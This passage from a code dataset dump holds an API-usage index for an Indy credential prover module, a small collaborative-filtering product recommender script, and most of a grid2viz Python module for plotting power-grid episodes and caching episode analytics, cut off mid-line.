"line_number": 515, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 516, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.AnoncredsMasterSecretDuplicateNameError", "line_number": 517, "usage_type": 
"attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 517, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 542, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 544, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 550, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 552, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 557, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_credential_req", "line_number": 558, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 558, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 585, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_store_credential", "line_number": 593, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 593, "usage_type": "name"}, {"api_name": "time.time", "line_number": 617, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 618, "usage_type": "call"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE.lock", "line_number": 620, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE", "line_number": 620, "usage_type": "name"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE.lock", "line_number": 623, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE", "line_number": 623, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 627, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 627, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 628, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 628, "usage_type": "name"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 632, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.archive", "line_number": 641, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 641, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 683, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 687, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 687, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 691, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 692, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 692, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 692, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 695, "usage_type": "call"}, {"api_name": "von_anchor.util.cred_def_id2seq_no", "line_number": 695, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 699, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 699, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 709, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials", "line_number": 775, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 775, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 777, "usage_type": "call"}, {"api_name": 
"von_anchor.codec.canon_wql", "line_number": 777, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 777, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 778, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 778, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 783, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search", "line_number": 790, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 790, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 792, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 838, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credential", "line_number": 872, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 872, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 873, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.WalletItemNotFound", "line_number": 874, "usage_type": "attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 874, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCred", "line_number": 879, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials_for_proof_req", "line_number": 1003, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1003, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1004, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1010, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 1011, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1042, "usage_type": "call"}, {"api_name": "von_anchor.util.prune_creds_json", "line_number": 1042, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1044, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 891, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1157, "usage_type": "call"}, {"api_name": "von_anchor.codec.canon_wql", "line_number": 1159, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials_for_proof_req", "line_number": 1161, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1161, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1164, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1167, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1173, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1174, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials_for_proof_req", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1175, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1178, "usage_type": "attribute"}, {"api_name": 
"von_anchor.wallet.Wallet", "line_number": 1178, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search_for_proof_req", "line_number": 1185, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1185, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1187, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 1051, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 1192, "usage_type": "name"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1245, "usage_type": "call"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1256, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_schema_id", "line_number": 1267, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1269, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1272, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 1277, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 1282, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1284, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1287, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 1292, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1294, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 1304, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentInterval", "line_number": 1312, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 1318, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1318, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 1320, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1320, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 1324, "usage_type": "call"}, {"api_name": "indy.anoncreds.create_revocation_state", "line_number": 1330, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1330, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1337, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_proof", "line_number": 1340, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1340, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1342, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1343, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1345, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1346, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1347, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1377, "usage_type": "call"}]} +{"seq_id": "41052188160", "text": "import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# Load the dataset containing customer purchase history\ndataset = pd.read_csv('customer_purchase_history.csv')\n\n# Perform data preprocessing and feature engineering\n# ...\n\n# Create a user-item matrix\nuser_item_matrix = dataset.pivot_table(index='CustomerID', columns='ProductID', values='PurchaseCount')\n\n# Calculate item-item similarity matrix using cosine similarity\nitem_similarity = 
cosine_similarity(user_item_matrix.fillna(0))\n\n# Function to generate personalized recommendations for a given user\ndef generate_recommendations(user_id, top_n):\n user_ratings = user_item_matrix.loc[user_id]\n similar_items = pd.Series(0, index=user_item_matrix.columns)\n \n # Calculate the weighted average of item ratings based on similarity scores\n for item_id, rating in user_ratings.iteritems():\n similar_items += item_similarity[item_id] * rating\n \n # Exclude items already purchased by the user\n similar_items = similar_items.drop(user_ratings.index)\n \n # Sort items based on their weighted ratings\n top_items = similar_items.sort_values(ascending=False).head(top_n)\n \n return top_items.index.tolist()\n\n# Generate personalized recommendations for a specific user\nuser_id = '12345'\ntop_n = 5\nrecommendations = generate_recommendations(user_id, top_n)\n\n# Print the recommended product IDs\nprint(f\"Recommended Products for User {user_id}:\")\nfor product_id in recommendations:\n print(product_id)\n", "repo_name": "syed-bot/midterm2023", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "42951645536", "text": "import configparser\nimport itertools\nimport json\nimport os\nimport time\nfrom pathlib import Path\nimport pickle\nimport gzip\n\nfrom colorama import Fore, Style\nimport dill\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom scipy.spatial import ConvexHull\nfrom grid2op.Episode import EpisodeData\nfrom grid2op.PlotGrid import PlotPlotly, PlotMatplot\n\nfrom grid2viz.src.kpi.EpisodeAnalytics import EpisodeAnalytics\n\n# refer to https://github.com/rte-france/Grid2Op/blob/master/getting_started/8_PlottingCapabilities.ipynb for better usage\n\ngraph = None\ngraph_matplotlib = None\n\n\n# TODO: addSubstationColor - integrate that into grid2op Plotgrid\ndef add_substation_color_matplot(subs, plot_helper, fig):\n radius_size = plot_helper._sub_radius\n # fig = plot_helper.plot_layout()\n ax = fig.gca()\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x, y = plot_helper._grid_layout[subName]\n circle = plt.Circle((x, y), int(radius_size), color=\"gold\")\n ax.add_artist(circle)\n\n return fig\n\n\ndef add_substation_color_plotly(subs, plot_helper, fig, color=\"gold\"):\n radius_size = int(plot_helper._sub_radius * 0.8)\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n\n marker_dict = dict(\n size=radius_size,\n color=color,\n showscale=False,\n opacity=0.5,\n )\n fig.add_trace(\n go.Scatter(\n x=[x_center],\n y=[y_center],\n mode=\"markers\",\n text=[subName],\n name=\"sub\" + subName,\n marker=marker_dict,\n showlegend=False,\n )\n )\n return fig\n\ndef add_alarm_area_plotly(line_subs, plot_helper, fig, color=\"gold\"):\n\n x=[]\n y=[]\n for id_sub in line_subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n x.append(x_center)\n y.append(y_center)\n\n points = [[lx, ly] for lx, ly in zip(x, y)]\n hull = ConvexHull(points)\n hull_vertices_x = [x[i] for i in hull.vertices]\n 
hull_vertices_y = [y[i] for i in hull.vertices]\n fig.add_trace(go.Scatter(\n x=hull_vertices_x,\n y=hull_vertices_y,\n marker=dict(color=color, size=2),\n mode=\"markers\",\n # name=\"Women\",\n fill=\"toself\",\n opacity=0.5\n ))\n return fig\n\n\n\ndef make_network(episode, responsive=True):\n \"\"\"\n Create a Plotly network graph with the layout configuration and the selected episode.\n\n :param episode: An episode containing targeted data for the graph.\n :return: Network graph\n \"\"\"\n global graph\n if graph is None:\n graph = PlotPlotly(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n responsive=responsive,\n )\n return graph\n\n\ndef make_network_matplotlib(episode,timestep=0):\n global graph_matplotlib\n if graph_matplotlib is None:\n graph_matplotlib = PlotMatplot(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n line_name=False,\n gen_name=False,\n load_name=False,\n )\n return graph_matplotlib\n\n\n######\n# we want a non responsive graph for now in agent_study\n# so we have to define it differently from the global graph in make_network that we don't use here\nimport base64\nimport io\ndef make_network_agent_study(episode, timestep, figure_obs=None, responsive=False,redraw=False):\n # subs_on_bus_2 = np.repeat(False, episode_data.observations[0].n_sub)\n #graph=None\n #if(isMatplotLib):########not working for now. Was trying to use matplotlib to accelerate ploting time\n # buf = io.BytesIO()\n # make_network_scenario_overview(episode,timestep=timestep)\n#\n#\n # # plt.figure(network_graph.number)\n # # plt.close(fig)\n # plt.savefig(buf, format=\"png\")\n # buf.seek(0)\n # #encoded_image = base64.b64encode(buf.read())\n#\n # #fig=encoded_image.decode()\n # data = base64.b64encode(buf.getbuffer()).decode(\"utf8\") # encode to html elements\n # buf.close()\n # return \"data:image/png;base64,{}\".format(data)\n\n observation=episode.observations[timestep]\n\n graph=make_network(episode, responsive)\n graph._sub_radius = 30 # instead of 25 by default\n graph._bus_radius = 10 # instead of 4 by default\n if(figure_obs)and not redraw:# don't redraw it from scratch, just change what is needed\n\n import plotly.colors as pc\n data_fig=figure_obs[\"data\"]#go.Figure(figure_obs)\n\n rho_lines=observation.rho\n n_lines=len(rho_lines)\n\n id_line=0\n i_traces=0\n previous_trace=None\n while id_line= 2\n ]\n fig = add_substation_color_plotly(\n sub_2buses, graph, fig, color=\"green\"\n ) # also other color for subs not in ref topo\n\n if (\"is_alarm\" in episode.action_data_table.columns):\n alarms_lines_area = episode.observations[timestep].alarms_lines_area\n\n light_colors_plotly = [\"lightcoral\", \"lightsalmon\", \"lightpink\"]\n n_colors = len(light_colors_plotly)\n\n if (episode.action_data_table.is_alarm[timestep]):\n\n alarm_zones = episode.action_data_table.alarm_zone[timestep]\n\n for i_zone,zone in enumerate(alarm_zones):\n id_lines_alarm = []\n for idx, line_name in enumerate(episode.observations[timestep].name_line):\n line_alarm_zones = alarms_lines_area[line_name]\n if(zone in line_alarm_zones):\n id_lines_alarm.append(idx)\n line_subs = [episode.observations[timestep].line_ex_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs += [episode.observations[timestep].line_or_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs = np.unique(line_subs)\n\n area_color= i_zone % n_colors\n fig = add_alarm_area_plotly(line_subs, graph, fig, 
color=light_colors_plotly[area_color])\n\n return fig\n\n\ndef make_network_agent_overview(episode):\n graph = make_network(episode)\n\n # modified_lines = actions_model.get_modified_lines(episode)\n # line_values = [None] * episode.n_lines\n # for line in modified_lines.index:\n # line_values[np.where(episode.line_names == line)[0][0]] = line\n\n lines_attacked = list(\n episode.attacks_data_table[\"id_lines\"][\n episode.attacks_data_table.attack\n ].unique()\n )\n lines_overflowed_ids = list(\n itertools.chain.from_iterable(episode.total_overflow_ts.line_ids)\n )\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[0]\n\n # having a rho with value 1.0 give us a red line while 0.7 gives us an orange line and 0.3 a blue line\n rho_to_color = np.array(\n [\n float(0.6) if line in lines_attacked else float(0.3)\n for line in episode.line_names\n ]\n )\n rho_to_color[lines_overflowed_ids] = 1.0\n line_status_colored = np.array(\n [False if line in lines_attacked else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n # network_graph = make_network(episode).plot_info(\n # line_values=[ line if line in lines_attacked else None for line in episode.line_names]\n # #coloring=\"line\"\n # )\n # )\n fig = graph.plot_obs(obs_colored, line_info=None, gen_info=None, load_info=None)\n\n ##########\n # We color subs where we had actions\n sub_name_modified = list(\n itertools.chain.from_iterable(episode.action_data_table.subs_modified)\n )\n sub_id_modified = set([int(str.split(\"_\")[1]) for str in sub_name_modified])\n fig = add_substation_color_plotly(sub_id_modified, graph, fig)\n\n return fig\n\n\ndef make_network_scenario_overview(episode,timestep=0):\n max_loads = (\n episode.load[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n max_gens = (\n episode.production[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n lines_in_maintenance = list(\n episode.maintenances[\"line_name\"][episode.maintenances.value == 1].unique()\n )\n\n graph = make_network_matplotlib(episode)\n\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[timestep]\n\n # having a rho with value 0.1 give us a blue line while 0.5 gives us an orange line\n # line in maintenance would display as dashed lines\n rho_to_color = np.array(\n [\n float(0.0) if line in lines_in_maintenance else float(0.4)\n for line in episode.line_names\n ]\n )\n line_status_colored = np.array(\n [False if line in lines_in_maintenance else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n obs_colored.load_p = np.array(max_loads.value)\n obs_colored.gen_p = np.array(max_gens.value)\n\n network_graph = graph.plot_obs(obs_colored, line_info=None)\n # network_graph=graph.plot_info(\n # #observation=episode.observations[0],\n # load_values=max_loads.values.flatten(),\n # load_unit=\"MW\",\n # gen_values=max_gens.values.flatten(),\n # gen_unit=\"MW\"\n # #line_values=[ 1 if line in lines_in_maintenance else 0 for line in 
episode.line_names],\n # #coloring=\"line\"\n # )\n\n return network_graph\n\n\nstore = {}\n\n\ndef make_episode(agent, episode_name,with_reboot=False):\n \"\"\"\n Load episode from cache. If not already in, compute episode data\n and save it in cache.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n episode=get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n episode = get_from_fs_cache(episode_name, agent)\n save_in_ram_cache(episode_name, agent, episode)\n #to see evolution of ram footprint\n #from guppy import hpy\n #h = hpy()\n #print(h.heap())\n else:\n episode = compute_episode(episode_name, agent,with_reboot)\n save_in_ram_cache(episode_name, agent, episode)\n\n if(with_reboot and \"reboot\" not in dir(episode)):\n #in that case we need to reload the episode from episode data object\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode.decorate_with_reboot(episode_data)\n save_in_ram_cache(episode_name, agent, episode)\n\n return episode\n\n\ndef make_episode_without_decorate(agent, episode_name,save=False):\n \"\"\"\n Load episode from cache without decorating with the EpisodeData attributes\n This is needed to use multiprocessing which pickles/unpickles the results.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data (without EpisodeData attributes), EpisodeData instance\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n if save:\n return None\n return get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n if save:\n return None\n beg = time.time()\n episode_analytics=get_from_fs_cache(episode_name, agent)\n return episode_analytics\n else:\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n if episode_data is not None:\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if save:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n return None #to avoid problem with picklalisable issues in multiprocess\n return episode_analytics\n else:\n return None\n\n\ndef clear_fs_cache():\n os.rmdir(cache_dir)\n\n\ndef is_in_fs_cache(episode_name, agent):\n dill_path=get_fs_cached_file(episode_name, agent)\n is_in_fs_cache=(os.path.isfile(dill_path) | os.path.isfile(dill_path+\".bz\"))\n return is_in_fs_cache\n\n\ndef get_fs_cached_file(episode_name, agent):\n episode_dir = os.path.join(cache_dir, episode_name)\n if not os.path.exists(episode_dir):\n os.makedirs(episode_dir,exist_ok=True)\n return os.path.join(episode_dir, agent + \".dill\")\n\ndef save_in_fs_cache(episode_name, agent, episode):\n path = get_fs_cached_file(episode_name, agent)\n\n #####\n #to assess size of objects\n\n #from pympler import asizeof\n #total_size=asizeof.asizeof(episode)\n #for key,value in vars(episode).items():\n # print(key)\n # print(asizeof.asizeof(value))\n # print(int(asizeof.asizeof(value)/total_size*100))\n\n #import bz2\n #import zipfile\n #bz2.BZ2File('bz2_test.pbz2', 'wb') as f:\n with gzip.open(path+\".bz\", \"wb\") as f:\n #with zipfile.ZipFile.write(path+\".zip\") as f:\n #with open(path, \"wb\") as f:\n #dill.dump(episode, f, protocol=4)\n pickle.dump(episode, f, protocol=4)\n\n\n\ndef get_from_fs_cache(episode_name, agent):\n beg = time.time()\n path = get_fs_cached_file(episode_name, agent)\n print(f\"Loading 
from filesystem cache agent {agent} on scenario {episode_name}...\")\n\n start = time.time()\n\n if(os.path.exists(path + \".bz\")):\n\n with gzip.open(path + \".bz\", \"rb\") as f:\n # with zipfile.ZipFile.open(path + \".zip\") as f:\n print(path)\n episode_analytics=pickle.load(f)\n else:\n with open(path, \"rb\") as f:\n episode_analytics = pickle.load(f)\n\n ######\n #add observation_space only to decorate as it could not be saved in pickle\n agent_path = os.path.join(agents_dir, agent)\n episode_analytics.decorate_obs_act_spaces(agent_path)\n\n\n ##########\n ##Warning for compatibility with older cache version:\n if(\"observations\" not in dir(episode_analytics)):\n print(\"WARNING: the cache management have been updated in grid2viz 1.3.1 for faster loading. \"\n \"You Should delete the old _cache folder and recompute it with latest grid2viz version\")\n episode_analytics.optimize_memory_footprint(opt_obs_act=True)#this adds a bit of 25% loading time overhead,\n # in particular when resetting observations and actions, which only brings a 10% size decrease\n\n #episode_analytics.decorate(episode_data)\n #episode_analytics=decorate(episode_analytics,episode_data)\n\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from filesystem cache in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef compute_episode(episode_name, agent,with_reboot=False):\n print(f\"Loading from logs agent {agent} on scenario {episode_name}...\")\n beg = time.time()\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if with_reboot:\n episode_analytics.decorate_with_reboot(episode_data)\n else:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n episode_analytics.decorate_obs_act_spaces(os.path.join(agents_dir, agent))\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from logs in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef retrieve_episode_from_disk(episode_name, agent):\n path = os.path.join(agents_dir, agent)\n episode_path = os.path.abspath(os.path.join(path, episode_name))\n if os.path.isdir(episode_path):\n episode_data = EpisodeData.from_disk(path, episode_name)\n return episode_data\n else:\n return None\n\n\ndef is_in_ram_cache(episode_name, agent):\n return make_ram_cache_id(episode_name, agent) in store\n\n\ndef save_in_ram_cache(episode_name, agent, episode):\n store[make_ram_cache_id(episode_name, agent)] = episode\n\n\ndef get_from_ram_cache(episode_name, agent):\n return store[make_ram_cache_id(episode_name, agent)]\n\n\ndef make_ram_cache_id(episode_name, agent):\n return agent + episode_name\n\n\ndef check_all_tree_and_get_meta_and_best(base_dir, agents):\n best_agents = {}\n meta_json = {}\n scenarios = set()\n survival_dic = {}\n attention_dic = {}\n\n for agent in agents:\n survival_dic_agent = {}\n attention_dic_agent = {}\n for scenario_name in os.listdir(os.path.join(base_dir, agent)):\n\n scenario_folder = os.path.join(base_dir, agent, scenario_name)\n if not os.path.isdir(scenario_folder):\n continue\n with open(os.path.join(scenario_folder, \"episode_meta.json\")) as f:\n episode_meta = json.load(fp=f)\n meta_json[scenario_name] = episode_meta\n\n survival_dic_agent[scenario_name] = int(\n int(episode_meta[\"nb_timestep_played\"])\n * 100\n / int(episode_meta[\"chronics_max_timestep\"])\n )\n scenarios.add(scenario_name)\n\n if 
scenario_name not in best_agents:\n                best_agents[scenario_name] = {\n                    \"value\": -1,\n                    \"agent\": None,\n                    \"out_of\": 0,\n                    \"cum_reward\": -1,\n                }\n            condition_to_update_best_agent = best_agents[scenario_name][\n                \"value\"\n            ] < episode_meta[\"nb_timestep_played\"] or (\n                best_agents[scenario_name][\"value\"]\n                == episode_meta[\"nb_timestep_played\"]\n                and best_agents[scenario_name][\"cum_reward\"]\n                < episode_meta[\"cumulative_reward\"]\n            )\n            if condition_to_update_best_agent:\n                best_agents[scenario_name][\"value\"] = episode_meta[\n                    \"nb_timestep_played\"\n                ]\n                best_agents[scenario_name][\"agent\"] = agent\n                best_agents[scenario_name][\"cum_reward\"] = episode_meta[\n                    \"cumulative_reward\"\n                ]\n\n            best_agents[scenario_name][\"out_of\"] = (\n                best_agents[scenario_name][\"out_of\"] + 1\n            )\n            other_reward_json_path=os.path.join(scenario_folder, \"other_rewards.json\")\n            if os.path.exists(other_reward_json_path):\n                with open(other_reward_json_path) as f:\n                    other_reward_meta = json.load(fp=f)\n                last_step_rewards=other_reward_meta[len(other_reward_meta) - 1]\n                if 'attention_score' in last_step_rewards.keys():\n                    attention_dic_agent[scenario_name] = last_step_rewards['attention_score']\n                f.close()\n\n\n        survival_dic[agent] = survival_dic_agent\n        attention_dic[agent] = attention_dic_agent\n\n    scenarios=list(scenarios)#instead of set, to avoid type errors when using pandas for instance\n    survival_df = pd.DataFrame(columns=agents, index=scenarios)\n    attention_df = pd.DataFrame(columns=agents, index=scenarios)#, dtype=np.int64)\n    for agent in agents:\n        survival_dic_agent = survival_dic[agent]\n        attention_dic_agent = attention_dic[agent]\n        for (scenario, survival_time) in survival_dic_agent.items():\n            survival_df.loc[scenario][agent] = survival_time\n        if len(attention_dic_agent) != 0:\n            for (scenario, attention_score) in attention_dic_agent.items():\n                attention_df.loc[scenario][agent] = np.round(attention_score,2)\n\n    survival_df = survival_df.fillna(-1) # To be able to cast as int below.\n    survival_df = survival_df.astype(int)\n\n    return meta_json, best_agents, survival_df, attention_df\n\ndef make_cache(scenarios,agents,n_cores,cache_dir,agent_selection=None):\n\n    if(agent_selection is not None):\n        agents=[agent for agent in agents if agent in agent_selection]\n\n    from pathos.multiprocessing import ProcessPool\n\n    if not os.path.exists(cache_dir):\n        print(\"Starting Multiprocessing for reading the best agent of each scenario\")\n\n        # TODO: not all agents have necessarily been run on exactly the same scenarios\n        # Avoid an error if an agent has not been run on a scenario\n        agent_scenario_list = [\n            (agent, scenario) for agent in agents for scenario in scenarios\n        ]\n\n        agents_data = []\n        if n_cores == 1: # no multiprocess useful for debug if needed\n            i = 0\n            for agent_scenario in agent_scenario_list:\n                agents_data.append(\n                    make_episode_without_decorate(agent_scenario[0], agent_scenario[1],save=True)\n                )\n                i += 1\n        else:\n            pool = ProcessPool(n_cores)\n            list(\n                pool.imap(\n                    make_episode_without_decorate,\n                    [agent_scenario[0] for agent_scenario in agent_scenario_list], # agents\n                    [agent_scenario[1] for agent_scenario in agent_scenario_list],\n                    [True for agent_scenario in agent_scenario_list],\n                )\n            ) # scenarios #we go over all agents and all scenarios for each agent\n            pool.close()\n        print(\"Multiprocessing done\")\n\n\n\"\"\"\nInitialisation routine\n\"\"\"\n\"\"\" Parsing of config file\"\"\"\nif not \"GRID2VIZ_ROOT\" in os.environ:\n    #get grid2viz package path\n    pkg_root_dir = 
